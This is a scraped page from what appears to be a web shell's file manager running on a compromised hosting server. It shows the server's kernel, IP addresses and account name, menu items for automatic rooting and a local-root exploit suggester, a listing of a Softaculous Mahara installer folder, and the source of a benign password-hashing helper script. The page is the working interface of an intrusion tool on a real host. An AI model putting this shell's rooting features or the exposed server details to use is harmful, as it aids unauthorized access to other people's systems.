Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.181
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
mahara /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php53
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php56
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php71
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php81
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php82
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
changelog.txt
10.99
KB
-rwxr-xr-x
2022-11-07 06:38
clone.php
6.56
KB
-rwxr-xr-x
2025-03-26 06:47
config.php
3
KB
-rwxr-xr-x
2022-11-07 06:38
edit.php
5.39
KB
-rwxr-xr-x
2025-03-26 06:47
edit.xml
433
B
-rwxr-xr-x
2021-12-23 06:54
fileindex.php
509
B
-rwxr-xr-x
2021-12-23 06:54
import.php
3.28
KB
-rwxr-xr-x
2025-03-26 06:47
info.xml
4.74
KB
-rwxr-xr-x
2025-03-26 06:40
install.js
921
B
-rwxr-xr-x
2021-12-23 06:54
install.php
8.63
KB
-rwxr-xr-x
2025-03-26 06:47
install.xml
1.43
KB
-rwxr-xr-x
2021-12-23 06:54
md5
2.71
KB
-rwxr-xr-x
2025-03-26 06:47
mod_upgrade.php
63.6
KB
-rwxr-xr-x
2022-11-07 06:38
notes.txt
2.18
KB
-rwxr-xr-x
2022-05-02 04:51
org_upgrade.php
63.57
KB
-rwxr-xr-x
2022-11-07 06:38
update_pass.php
1.23
KB
-rwxr-xr-x
2021-12-23 06:54
upgrade.php
6.36
KB
-rwxr-xr-x
2025-03-26 06:47
upgrade.xml
334
B
-rwxr-xr-x
2022-05-02 04:51
Save
Rename
<?php $resp = __encrypt_password('[[admin_pass]]', '[[salt]]', '$2a$' . '12' . '$', '[[passwordsaltmain]]'); echo '<update_pass>'.$resp.'</update_pass>'; function __encrypt_password($password, $salt='', $alg='$6$', $sitesalt='') { if ($salt == '') { $salt = substr(md5(rand(1000000, 9999999)), 2, 8); } if ($alg == '$6$') { // $6$ is the identifier for the SHA512 algorithm // Return a hash which is sha512(originalHash, salt), where original is sha1(salt + password) $password = sha1($salt . $password); // Generate a salt based on a supplied salt and the passwordsaltmain $fullsalt = substr(md5($sitesalt . $salt), 0, 16); // SHA512 expects 16 chars of salt } else { // This is most likely bcrypt $2a$, but any other algorithm can take up to 22 chars of salt // Generate a salt based on a supplied salt and the passwordsaltmain $fullsalt = substr(md5($sitesalt . $salt), 0, 22); // bcrypt expects 22 chars of salt } $hash = crypt($password, $alg . $fullsalt); // Strip out the computed salt // We strip out the salt hide the computed salt (in case the sitesalt was used which isn't in the database) $hash = substr($hash, 0, strlen($alg)) . substr($hash, strlen($alg)+strlen($fullsalt)); return $hash; } @unlink('update_pass.php'); ?>